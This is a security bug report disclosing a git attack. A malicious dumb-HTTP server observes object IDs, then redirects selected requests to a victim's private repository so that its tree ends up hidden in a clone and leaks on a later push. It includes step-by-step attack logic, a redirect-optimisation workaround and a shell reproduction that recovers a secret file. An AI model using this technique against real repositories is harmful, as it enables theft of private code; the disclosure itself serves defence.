This bug report assumes the following scenario: - A victim has access to a private git repository. - An attacker who knows the URL to the private repository wants to steal its contents. - The private git repository can be accessed over http or https. - The private git repository supports the dumb HTTP transport. - The victim authenticates to the private git repository either by source IP (imagine a git server in a company's internal network without explicit authentication) or has the credentials stored in a .netrc file. - To simplify the attack, it is assumed that the private git repository only contains one branch and no tags. - The attacker can convince the victim to pull a repository from the attacker's server, create a new commit in it and afterwards perform a push to the victim's server. - The victim retries fetching the attacker's repository if the first attempt fails. - I think packfiles on the server might block this attack. The basic idea of the attack is: Because in the dumb HTTP protocol, each object is fetched using a separate HTTP request and git instructs curl to follow HTTP redirects, it is possible for a server to "mix in" objects from another server during a fetch/clone operation by selectively redirecting requests to the other server. If the user does not inspect all subdirectories of the cloned repository and pushes the cloned repository back to the internet, the mixed-in objects will be pushed as well. More detailed steps of the attack: 1. When the user attempts to clone from the attacking server for the first time, forward all accesses to the victim server. This allows the attacker to observe object IDs from the repository (because they are sent in URLs). If there is only one branch, the first request for an object ID will be for the latest commit, the second one will be for the latest commit's tree. After the object ID of the tree has been observed, all requests that arrive within a short timeframe can be rejected with an HTTP response like "500 temporary error" or so. Now, since the victim tree's object ID is known, the attacker can construct a git repository in which some tree contains an entry pointing to the victim tree. 2. When the user retries the clone operation (or someone else in the same network does), the attacker responds to requests with files from his own repository. If a requested object doesn't exist, it is assumed that the object is present on the victim server, and a redirect is sent. After this step, the victim user should have a repository that contains the attacker-created tree, with the contents of the private git repository's tree hidden in some subdirectory. (A more sneaky way would be to hide the private repository's tree somewhere in the history, not under the head commit.) 3. If the user now pushes the contents of the cloned repository (perhaps after adding a few more commits or so), the pushed repository contains a copy of the private repository's tree. An issue for the attacker is that git attempts to optimize away redirects by emulating redirects locally if the redirect scheme looks predictable (in update_url_from_redirect()). However, this can be worked around by appending a dummy parameter to the URL, causing git to bail out of the optimization (the "insane redirect scheme" case). Reproduction instructions: Prepare the private repository: ~$ mkdir -p tmp/gitmix/victim_repo ~$ cd tmp/gitmix/victim_repo ~/tmp/gitmix/victim_repo$ git init Initialized empty Git repository in [...]/tmp/gitmix/victim_repo/.git/ ~/tmp/gitmix/victim_repo$ echo 'this is secret!' > secret.txt ~/tmp/gitmix/victim_repo$ git add secret.txt ~/tmp/gitmix/victim_repo$ git commit -m'initial commit' [master (root-commit) 9f73f5b] initial commit 1 file changed, 1 insertion(+) create mode 100644 secret.txt ~/tmp/gitmix/victim_repo$ git update-server-info ~/tmp/gitmix/victim_repo$ cd .git/ ~/tmp/gitmix/victim_repo/.git$ python -m SimpleHTTPServer 8001 . Serving HTTP on 0.0.0.0 port 8001 ... In a new tab, prepare the attacker's repository, where `forward.py` is the attached file: ~$ mkdir tmp/gitmix/attacker_repo ~$ cd tmp/gitmix/attacker_repo ~/tmp/gitmix/attacker_repo$ git init Initialized empty Git repository in [...]/tmp/gitmix/attacker_repo/.git/ ~/tmp/gitmix/attacker_repo$ echo 'just a harmless repo' > harmless_file ~/tmp/gitmix/attacker_repo$ git add harmless_file ~/tmp/gitmix/attacker_repo$ git commit -m'initial commit' [master (root-commit) 7e13ade] initial commit 1 file changed, 1 insertion(+) create mode 100644 harmless_file ~/tmp/gitmix/attacker_repo$ git update-server-info ~/tmp/gitmix/attacker_repo$ python [...]/forward.py serving at port 8000 Now, in another tab, as the victim user: ~$ cd tmp/gitmix/ ~/tmp/gitmix$ git clone http://localhost:8000/ Cloning into 'localhost'... error: The requested URL returned error: 500 temporary error, please try again (curl_result = 22, http_code = 500, sha1 = fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5) error: Unable to find fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5 under http://localhost:8000 Cannot obtain needed tree fc9f3b913607dc0fd2117a1b15e4a7c063c8b1e5 while processing commit 9f73f5bade6cac025eb9bbc726fafe3cf878586c. error: fetch failed. ~/tmp/gitmix$ # ensure at least 1s of delay here, then retry ~/tmp/gitmix$ git clone http://localhost:8000/ Cloning into 'localhost'... Checking connectivity... done. ~/tmp/gitmix$ tree localhost/ localhost/ ├── boring_subdir │ └── secret.txt └── harmless_file 1 directory, 2 files ~/tmp/gitmix$ cat localhost/harmless_file just a harmless repo ~/tmp/gitmix$ cat localhost/boring_subdir/secret.txt this is secret! As you can see, the victim user indeed ends up with a repository that contains a mix of data from the attacker's repository and from the private repository. At this point, pushing to any repository will leak the contents of the private repository. To remove the restriction that the private repository must not have more than one branch, a variation could be employed; for example, the attacker could store the first observed object ID instead of the second one (thereby guaranteeing that it belongs to a commit) and then rebase his whole history on top of that commit ID. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
↧
Git: private repository theft by mixing repositories
↧